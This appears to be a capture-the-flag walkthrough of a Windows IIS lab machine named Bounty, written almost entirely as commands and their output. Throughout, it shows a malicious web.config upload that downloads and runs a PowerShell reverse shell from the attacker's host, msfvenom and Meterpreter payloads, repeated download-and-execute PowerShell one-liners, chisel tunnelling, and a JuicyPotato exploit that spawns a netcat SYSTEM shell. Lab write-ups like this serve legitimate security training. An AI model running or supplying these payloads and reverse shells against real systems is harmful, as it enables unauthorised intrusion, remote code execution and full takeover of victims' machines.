nmap -sC -sV 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.099s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ffuf -u http://10.10.10.93/FUZZ.aspx -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Method : GET
:: URL : http://10.10.10.93/FUZZ.aspx
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 941, Words: 89, Lines: 22, Duration: 125ms]
* FUZZ: transfer
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.10 LPORT=9999 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2889 bytes
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
,payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.10:9999
#intercept the traffic with burp
#send the traffic to the intruder
#filename= "test.FUZZ"
#select seclists/Discovery/Web-Content/raft-small-words-lowercase.txt as payload
#anaylze the length of the result
POST /transfer.aspx HTTP/1.1
Host: 10.10.10.93
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------133661013821714142042995077179
Content-Length: 843
Origin: http://10.10.10.93
Connection: close
Referer: http://10.10.10.93/transfer.aspx
Upgrade-Insecure-Requests: 1
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTI3ODM5MzQ0Mg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYCAgUPDxYGHgRUZXh0BR5JbnZhbGlkIEZpbGUuIFBsZWFzZSB0cnkgYWdhaW4eCUZvcmVDb2xvcgqNAR4EXyFTQgIEZGRk8VjbSvn+LXz7RzVAc6h24qWeuwo=
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgKBgcHqBgLt3oXMA5qrpkoEt38KIBsq9IVcGsd80Cs+
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="FileUpload1"; filename="test.config"
Content-Type: text/plain
test
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="btnUpload"
Upload
-----------------------------133661013821714142042995077179--
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 20 Apr 2023 13:10:43 GMT
Connection: close
Content-Length: 1110
*
*snipped
*
File uploaded successfully.
*
*snipped
*
vim ../nishang/Shells/Invoke-PowerShellTcp.ps1
#added end of the line
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9898
nc -lvnp 9898
listening on [any] 9898 ...
tail -2 Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9898
tail -3 web.config
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.10:9998/Invoke-PowerShellTcp.ps1')")
%>
python -m http.server 9998
Serving HTTP on 0.0.0.0 port 9998 (http://0.0.0.0:9998/) ...
#upload web.config file
#visit 10.10.10.93/uploadedfiles/web.config
python -m http.server 9998
Serving HTTP on 0.0.0.0 port 9998 (http://0.0.0.0:9998/) ...
10.10.10.93 - - [20/Apr/2023 09:31:12] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
nc -lvnp 9898
listening on [any] 9898 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv> cd C:\users\merlin\desktop
PS C:\users\merlin\desktop> attrib
A SH C:\users\merlin\desktop\desktop.ini
A HR C:\users\merlin\desktop\user.txt
PS C:\users\merlin\desktop> type user.txt
6f9be0e21f1beae7e333e8ff3cbaa86c
PS C:\> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 4/20/2023, 2:46:22 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,520 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,532 MB
Virtual Memory: In Use: 563 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
#saved as sysinfo.txt
python2 windows-exploit-suggester.py --database 2023-04-18-mssb.xls --systeminfo sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
#DID NOT GET USEFUL INFO
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/winPEAS.bat','C:\\Windows\\Temp\\winPEAS.bat')";
PS C:\Windows\Temp> .\winPEAS.bat
.
.Snipped
.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
.
.Snipped
.
ROGUE POTATO
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/RoguePotato.exe','C:\\Windows\\Temp\\RoguePotato.exe')"
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/chisel.exe','C:\\Windows\\Temp\\chisel.exe')"
#second reverse shell
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/Invoke-PowerShellTcpOneLine.ps1','C:\\Windows\\Temp\\Invoke-PowerShellTcpOneLine.ps1')"
powershell.exe -exec bypass -WindowStyle Hidden -NoLogo -file "Invoke-PowerShellTcpOneLine.ps1"
nc -lvnp 9899
listening on [any] 9899 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49186
PS C:\windows\temp> id
PS C:\windows\temp> whoami
bounty\merlin
chisel server --reverse --port 8000
server: Reverse tunnelling enabled
server: Listening on http://0.0.0.0:8000
#victim machine
.\chisel.exe client 10.10.14.10:8000 R:9999:localhost:9999
#attacker machine
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/Invoke-PowerShellTcpOneLine_potato.ps1','C:\\Windows\\Temp\\Invoke-PowerShellTcpOneLine_potato.ps1')"
"powershell.exe -exec bypass -WindowStyle Hidden -NoLogo -file C:\\Windows\\Temp\\Invoke-PowerShellTcpOneLine_potato.ps1"
PS C:\windows\temp> .\RoguePotato.exe -r 10.10.14.10 -e "powershell -exec bypass -WindowStyle Hidden -NoLogo C:\Windows\Temp\Invoke-PowerShellTcpOneLine_potato.ps1" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:104 bytes
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[-] Named pipe didn't received any connect request. Exiting ...
#It did not work out because the SMB service is not running. RoguePotato needs SMB for explotation.
METASPLOIT EXPLOIT SUGGESTER
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/reverse.exe','C:\\Windows\\Temp\\reverse.exe')"
.\reverse.exe
msf6 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(multi/handler) > set LPORT 7878
LPORT => 7878
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.10:7878
[*] Sending stage (175686 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.14.10:7878 -> 10.10.10.93:49224) at 2023-04-20 11:42:55 -0400
meterpreter > getuid
Server username: BOUNTY\merlin
meterpreter > ps
2300 1244 w3wp.exe x64 0 BOUNTY\merlin C:\Windows\System32\inetsrv\w3wp.exe
meterpreter > migrate 2300
[*] Migrating from 1704 to 2300...
[*] Migration completed successfully.
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) >
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - 183 exploit checks are being tried...
[-] 10.10.10.93 - Post interrupted by the console user
[*] Post module execution completed
#DID NOT WORK
JUICY POTATO
PS C:\windows\temp> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/nc64.exe','C:\\Windows\\Temp\\nc64.exe')"
PS C:\windows\temp> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/JuicyPotato.exe','C:\\Windows\\Temp\\JuicyPotato.exe')"
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\\Windows\\Temp\\nc64.exe -e cmd.exe 10.10.14.10 7777" -t *
nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49243
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
fac3997f42dc78a170642d3a11d9e0bb
Reference
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services
https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet/blob/master/web.config
https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato
https://github.com/antonioCoco/RoguePotato